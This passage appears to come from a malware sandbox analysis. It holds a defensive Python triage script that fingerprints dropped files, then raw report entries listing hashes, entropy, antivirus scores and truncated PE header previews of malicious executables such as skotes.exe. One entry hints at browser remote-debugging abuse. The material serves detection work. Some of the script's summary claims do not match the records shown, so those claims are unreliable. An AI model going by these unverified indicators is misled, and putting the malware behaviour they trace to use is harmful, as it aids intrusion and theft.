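     "malicious": True, "av": {"Avira": 100, "Joe Sandbox ML": 100, "ReversingLabs": 38}},
    {"process": "skotes.exe", "size": 2832896, "entropy": 6.5165667331631,
     "sha256": "7D9E4AF11845E1A8490A2A0D5D71670EBC3FA21B0A8F16656661396A9053CF2E",
     "malicious": True, "av": {"Avira": 100, "Joe Sandbox ML": 100}},
    {"process": "513dad5c05.exe", "size": 2989568, "entropy": 6.518795012161611,
     "sha256": "F95DF3026CF4EDCC3D334BFC20D188DE06EA4E4497E94C63504B2B783DC3E55E",
     "malicious": True, "av": {"Avira": 100, "Joe Sandbox ML": 100}},
    {"process": "skotes.exe", "size": 1114112, "entropy": 7.7336985855739355,
     "sha256": "33C236DC81AF2A47D595731D6FA47269B2874B281152530FDFFDDA9CBEB3B501",
     "malicious": True, "av": {"Joe Sandbox ML": 100, "ReversingLabs": 67}},
    {"process": "513dad5c05.exe", "size": 257872, "entropy": 6.727482641240852,
     "sha256": "74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A",
     "malicious": True, "av": {"ReversingLabs": 0}},
]


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def fingerprint(data: bytes) -> dict:
    """Recompute the identity fields the report prints for a dropped file."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
        # DOS stub magic only; a real PE check must also follow e_lfanew to "PE\0\0".
        "is_pe": data[:2] == b"MZ",
    }


def triage(records: list, submitted_sha256: str = SUBMITTED_SHA256) -> dict:
    """Apply three triage rules; return lowercase SHA-256 hits per rule."""
    findings = {"self_copy": [], "packed": [], "sandbox_only": []}
    for rec in records:
        sha = rec["sha256"].lower()
        # 1. Drop is byte-identical to the submitted sample: the chain re-stages
        #    the original binary (relaunch/persistence), not a new payload.
        if sha == submitted_sha256.lower():
            findings["self_copy"].append(sha)
        # 2. Entropy near 8 bits/byte: packed or encrypted body, so static
        #    signatures and section names are unreliable until it is unpacked.
        if rec["entropy"] >= PACKED_ENTROPY:
            findings["packed"].append(sha)
        # 3. Sandbox says malicious while every static scanner scored 0%:
        #    conviction rests on behaviour alone; queue it for manual review.
        if rec["malicious"] and max(rec["av"].values(), default=0) == 0:
            findings["sandbox_only"].append(sha)
    return findings


if __name__ == "__main__":
    for rule, hits in triage(DROPPED).items():
        print(f"{rule}: {len(hits)} -> {hits}")
```

Run against the records above, the self-copy rule matches the 2,989,568-byte drop from 513dad5c05.exe, whose SHA-256 equals that of the submitted file.exe; the packed rule flags the two skotes.exe drops at 7.94 and 7.73 bits per byte; and the sandbox-only rule isolates the two DLLs that ReversingLabs scored at 0% despite the malicious verdict. Use `fingerprint()` on a file pulled from an infected host to confirm it is the same artifact before applying these hashes as indicators.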
Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):257872
Entropy (8bit):6.727482641240852
Encrypted:false
SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:4E52D739C324DB8225BD9AB2695F262F
SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:true
Antivirus:
• ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):80880
                                                                                                                                                                                                                              Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                              MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                              SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                              SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                              SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):612
                                                                                                                                                                                                                              Entropy (8bit):4.903167881740855
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:hYNp/qwNFDvNbJw4xxaboR1XKCf0ktEjo+Y/lNQd40UlNRVxWU+oQL:hYNpnjbJwtsvXD05oP/l8tUlj7W7
                                                                                                                                                                                                                              MD5:E3EB0A1DF437F3F97A64ACA5952C8EA0
                                                                                                                                                                                                                              SHA1:7DD71AFCFB14E105E80B0C0D7FCE370A28A41F0A
                                                                                                                                                                                                                              SHA-256:38FFD4972AE513A0C79A8BE4573403EDCD709F0F572105362B08FF50CF6DE521
                                                                                                                                                                                                                              SHA-512:43573B0CBAAC6E2E1646E6217D2D10C40AD10B9DB1F4492D6740545E793C891B5E39283A082896C0392B88EB319DFA9392421B1C89C094C9CE9F31B53D37EBAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html>.<head>.<title>Welcome to nginx!</title>.<style>. body {. width: 35em;. margin: 0 auto;. font-family: Tahoma, Verdana, Arial, sans-serif;. }.</style>.</head>.<body>.<h1>Welcome to nginx!</h1>.<p>If you see this page, the nginx web server is successfully installed and.working. Further configuration is required.</p>..<p>For online documentation and support please refer to.<a href="http://nginx.org/">nginx.org</a>.<br/>.Commercial support is available at.<a href="http://nginx.com/">nginx.com</a>.</p>..<p><em>Thank you for using nginx.</em></p>.</body>.</html>.
                                                                                                                                                                                                                              Process:C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe
                                                                                                                                                                                                                              File Type:PNG image data, 300 x 300, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):36016
                                                                                                                                                                                                                              Entropy (8bit):7.983926499838966
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:tCJpXgIqzFJfREOAev/Gp0/XlxqHNxGny8mewtOodJCDz3E:oJ9WR3Aev/20/VxqHNTBfd0D4
                                                                                                                                                                                                                              MD5:A293ABF92B1DE52DF77CBCA7C5D98DF2
                                                                                                                                                                                                                              SHA1:DD342D01A0AFA093092EB544D6D7AD50EFAC6E96
                                                                                                                                                                                                                              SHA-256:FAB35B6046CF4E853CB7FE432850DD29A459576E3C21D8B29B0B06211612B40E
                                                                                                                                                                                                                              SHA-512:C21186913AE669BAB9E6BC5BAFD8EDCA2A89894CF6B86E85D7BC9DD103BF064923201A06E8C7EFDF0ACFF5E3BF0C9CE8D9F0A726C1E4AC8D411BEAD5B3E7ED8D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:V:V
                                                                                                                                                                                                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:0
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1787
                                                                                                                                                                                                                              Entropy (8bit):5.372094093019268
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:SfNaoC1TECgfNaoC+vfF4f4C+vfrfNaoC5CffNaoCTqE0UrU0U8CTq:6NnC1TECsNnCmN4QCmbNnC5C3NnCV0Ub
                                                                                                                                                                                                                              MD5:23FB137FFE9C4A8C8F6F7783FE15C019
                                                                                                                                                                                                                              SHA1:C29328CA28F99DED07257772C69D1E10DB70B330
                                                                                                                                                                                                                              SHA-256:D39444B42DDAEC91F1BF7995044041167EBF67867D3DFCC334CE339E85AC15FC
                                                                                                                                                                                                                              SHA-512:E0828B8AFAC8E35FC8DA490B87F30583BFE93ECAA3D7DF4CCABB9445CFC70A135158F35A12EFA0815702EDCBF6BF51A30AA8E1DDF14E5F7A5A30AAC68F48A2C9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/D73E935C1FFBDB5121A221394EEA5057",.. "id": "D73E935C1FFBDB5121A221394EEA5057",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/D73E935C1FFBDB5121A221394EEA5057"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/5AEDB137CB67AD7229F42F9A05B93E4B",.. "id": "5AEDB137CB67AD7229F42F9A05B93E4B",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/5AEDB137CB67AD7229F42F9A05B93E4B"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):22016
                                                                                                                                                                                                                              Entropy (8bit):5.338206717136569
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:78HIRrJs1HLBDhq5RWBNBlBThtq2uoyLizwxeNLHdWuNMV275RtAcL8SFS69rvwM:Qqls1HLBDhIRWbXlq2uVk75RuSFSm6EJ
                                                                                                                                                                                                                              MD5:04F57C6FB2B2CD8DCC4B38E4A93D4366
                                                                                                                                                                                                                              SHA1:61770495AA18D480F70B654D1F57998E5BD8C885
                                                                                                                                                                                                                              SHA-256:51E4D0CBC184B8ABFA6D84E219317CF81BD542286A7CC602C87EB703A39627C2
                                                                                                                                                                                                                              SHA-512:53F95E98A5ECA472ED6B1DFD6FECD1E28EA66967A1B3AA109FE911DBB935F1ABF327438D4B2FE72CF7A0201281E9F56F4548F965B96E3916B9142257627E6CCD
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 57%
                                                                                                                                                                                                                              Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2862592
Entropy (8bit):6.510957512245679
Encrypted:false
SSDEEP:49152:6fF5xPCzMPawdr/lJnsByv1AMJGQHQZOSTskFiza7j1ZpQjn7c6DBklg:6NfPCzMPawdr/lJnsByv1XGiQZOSTskC
MD5:6149ACB6D658FE29407A8AB94D3A0784
SHA1:8DDA8F399536348199633F110A0C1BD46F3CA683
SHA-256:6E339B0795D670E0D4C8CE7FA99444538DFBE76FC5889B3D121F3D843D7DBE8C
SHA-512:BD9C4E5DFD3DBAF310631E75157719C823FE2718870707EEDC184EE2F4E9E0BF0FDA8DE0FBA5DF0067988883914CD9387D730E7B5CCB58573CC2766EF06FFA2A
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........N...........@...........................O.....*t,...@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@...ifvqdref..*...$...*..|..............@...ulfvmwmt......N.......+.............@....taggant.0....N.."....+.............@...........................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1863680
Entropy (8bit):7.947727721324286
Encrypted:false
SSDEEP:49152:b0iMcVeC2k+eFGF2uX6zTTIudd8Cshc5:oi5zTop63rLW
MD5:27C1F96D7E1B72B6817B6EFEFF037F90
SHA1:2972CC112FC7E20CBF5952ABE07407B8C1FBB2A2
SHA-256:AEC3EC473DE321D123E939985579227EE62B53B3B3EDB7AB96E2A66C17E9696D
SHA-512:9A31DC9945889D35AEA8710DF2F42806C72C422B7B5F4AA8ACBA6986CBD9EA6A49181A41A50EE21CCBED86CBFF87C98A742E681AC3F6A87E2BD4436C9112EB32
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 58%
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................pI...........@...........................I.....2.....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... .0*..@.......\..............@...lzigcvvj.....p/......^..............@...pdsqmwos.....`I......J..............@....taggant.0...pI.."...N..............@...................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):863093
Entropy (8bit):7.96744840145825
Encrypted:false
SSDEEP:24576:qWryjPGki4+5vfHU3fYFy664hRvRKMU+Et:1+FQVUPA/v8MhQ
MD5:8EB4F92605E35C57A42B0917C221D65C
SHA1:0E64D77EF1B917B3AFE512B49710250C71369175
SHA-256:B57D78D93F74F7AE840AB03D3FDA4F22A24AD35AFCF9A53128CF82A92A67A085
SHA-512:4CC5DB426C8DE3D7AFDCFA26440D5BD9A885F5148E4307B8D04C5D56C96672D5C82ED9989BF346CE7AECEA07D980735C46A930B885F824BA53738AC76DBB05BF
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................p............@.................................@............R...............$...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc....R.......T..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):1374720
Entropy (8bit):7.0671827674657335
Encrypted:false
SSDEEP:24576:fYlZH+uQDPYLZtPikfLyXFD3qRc4f6GO4k88P9VB77Ml8fmMxHr:fYu7DPYLZtakzyVD3ELCh//+8fmW
MD5:669ED3665495A4A52029FF680EC8EBA9
SHA1:7785E285365A141E307931CA4C4EF00B7ECC8986
SHA-256:2D2D405409B128EEA72A496CCFF0ED56F9ED87EE2564AE4815B4B116D4FB74D6
SHA-512:BEDC8F7C1894FC64CDD00EBC58B434B7D931E52C198A0FA55F16F4E3D44A7DC4643EAA78EC55A43CC360571345CD71D91A64037A135663E72EED334FE77A21E6
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 28%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....h.D..........&....&..........................@..........................p......\U....@... ..............................P..........,l.......................c...................................................T...............................text...............................`..`.data...H...........................@....rdata..............................@..@.eh_fram............p..............@..@.bss....4....@...........................idata.......P......................@....CRT....8....p.......$..............@....tls.................&..............@....rsrc...,l.......n...(..............@..@.reloc...c.......d..................@..B................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:V:V
MD5:CFCD208495D565EF66E7DFF9F98764DA
SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:false
Reputation:unknown
Preview:0
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):4471808
Entropy (8bit):7.986737809414949
Encrypted:false
SSDEEP:98304:7j9CAb4Juu5XcCCvf1it7R0E395jinPEQIYocTbc7M/f5iBGLf0I:7JCAb42Cg0t7fUPzj5iBosI
MD5:6D3D9DB92D0303C635E5EE37927AF3D0
SHA1:2503576F28631D418C634A20EE4DEBAD8B93CF40
SHA-256:8B09CD26504C9B2E50C6A82A63CD41F25EF88B5D144708EBD444FEF16721F4E4
SHA-512:249A3F1FC17AB61B9E90E985AC292CEABB80AB8DDD360B9231E125C88816A8672397C56DD03D935D81DC748296C93F3BC99BB8C45B1A816084726839954C9EAA
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@..................................{D...@... ............................._.r.s.....r.....................|...............................,....................................................... . ..r......4(.................@....rsrc.........r......D(.............@....idata ......r......F(.............@... ..9...r......H(.............@...hdwdyvma............J(.............@...sgdtbgtm..............D.............@....taggant.0......."....D.............@...........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):968704
Entropy (8bit):6.699085607109417
Encrypted:false
SSDEEP:12288:OqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDga7lk0:OqDEvCTbMWu7rQYlBQcBiT6rprG8aJL
MD5:FB1BFBB2B0FA71F93BEFD137BECD031B
SHA1:067E74E608761765408F511DB0EA7927AD898D9A
SHA-256:D8B3EC82006B92576468332476E7A0D0AB6666780169BBDCCD3523CD04702B18
SHA-512:8FF15CD4D17F3AE176D664E1691F328F2571218038213573DA62C1DF99D9F127850008B833F45DC924B4B2CB9B9752115809500270E02060FD4DE4B82C172D06
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:V:V
MD5:CFCD208495D565EF66E7DFF9F98764DA
SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:false
Reputation:unknown
Preview:0
Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
File Type:data
Category:dropped
Size (bytes):97296
Entropy (8bit):7.9982317718947025
Encrypted:true
SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
MD5:E6743949BBF24B39B25399CD7C5D3A2E
SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4438776
Entropy (8bit):7.99505709582503
Encrypted:true
SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 87%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1831936
Entropy (8bit):7.947651280489633
Encrypted:false
SSDEEP:49152:PfsZ4UgTVsUOU0YDYV7goy1ERSTn73kctxI:PfoTgZHOUeVFyG2jkcTI
MD5:C20D4E11E1046A5665D427BB4F6DE39E
SHA1:7DE8606D46B0B756D63D6ADC2D906B8752CDA9A5
SHA-256:486D1F0393573819C605E951CF677FBE4F7176B0313467F2E1716077F56C36C1
SHA-512:DF671D80E8D17B502208C1BDE7DDBF13D51BCC99F314ECAFB21086C7FC8F3B70F9CA5C6B8B23721CB77DA3171D0C68C59BC7F032D79DA1F1EE53F5F1F5598FBD
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):776832
Entropy (8bit):7.859727158445845
Encrypted:false
SSDEEP:12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
MD5:AFD936E441BF5CBDB858E96833CC6ED3
SHA1:3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
SHA-256:C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
SHA-512:928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 68%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):4472832
Entropy (8bit):7.9831324854567525
Encrypted:false
SSDEEP:98304:0AxwVsVZfgzsP1cbHf1EPVqiWzt7+upuJl184hMfyQmEhGR6NOBUDi:0ASgfgg19MiW8GuJl1wyO7rG
MD5:AF683C74F40C689194ACC25F6A9DFFEC
SHA1:B3F7FD19A91ED79DCBEFB82FF38D644301287BC0
SHA-256:ED7428FF275BAF08AD7E20DB9F514302495927A744613ABDB77AEED0A0ADD3C9
SHA-512:BC5058BCA0FEEDDC41DD798257991F7788CE183489AD11EEF9E008C0DA4A2B78BDEECF4BED86571A20ECFD23C41E7F87CAD577CCCAD804F36DBB5C5C309C852F
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1502720
Entropy (8bit):7.646111739368707
Encrypted:false
SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
SHA1:121356839E8138A03141F5F5856936A85BD2A474
SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 75%
Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:modified
Size (bytes):64
Entropy (8bit):1.1940658735648508
Encrypted:false
SSDEEP:3:NlllulY1z:NllU
MD5:15DE8A418257BAFE9A8497597CEC81D6
SHA1:66DC5A394584B8B24B91D60FC438624E311FEED9
SHA-256:36D792AEBDA7E7689763619E4979CA477DAC40B5B6222F41159DA5BCED20476B
SHA-512:FC7229A3A7E7E600569BA7F0F0A9F3D4A6E0FC7A7404CD9C45C28E7457F712C7946CF84A39CC74525394AF75399E2F307E9F34890D1F01063FBC6AE07213A73A
Malicious:false
Reputation:unknown
Preview:@...e...................................,............@..........

Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:HTML document, ASCII text
Category:dropped
Size (bytes):612
Entropy (8bit):4.903167881740855
Encrypted:false
SSDEEP:12:hYNp/qwNFDvNbJw4xxaboR1XKCf0ktEjo+Y/lNQd40UlNRVxWU+oQL:hYNpnjbJwtsvXD05oP/l8tUlj7W7
MD5:E3EB0A1DF437F3F97A64ACA5952C8EA0
SHA1:7DD71AFCFB14E105E80B0C0D7FCE370A28A41F0A
SHA-256:38FFD4972AE513A0C79A8BE4573403EDCD709F0F572105362B08FF50CF6DE521
SHA-512:43573B0CBAAC6E2E1646E6217D2D10C40AD10B9DB1F4492D6740545E793C891B5E39283A082896C0392B88EB319DFA9392421B1C89C094C9CE9F31B53D37EBAF
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html>.<head>.<title>Welcome to nginx!</title>.<style>. body {. width: 35em;. margin: 0 auto;. font-family: Tahoma, Verdana, Arial, sans-serif;. }.</style>.</head>.<body>.<h1>Welcome to nginx!</h1>.<p>If you see this page, the nginx web server is successfully installed and.working. Further configuration is required.</p>..<p>For online documentation and support please refer to.<a href="http://nginx.org/">nginx.org</a>.<br/>.Commercial support is available at.<a href="http://nginx.com/">nginx.com</a>.</p>..<p><em>Thank you for using nginx.</em></p>.</body>.</html>.

Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4438776
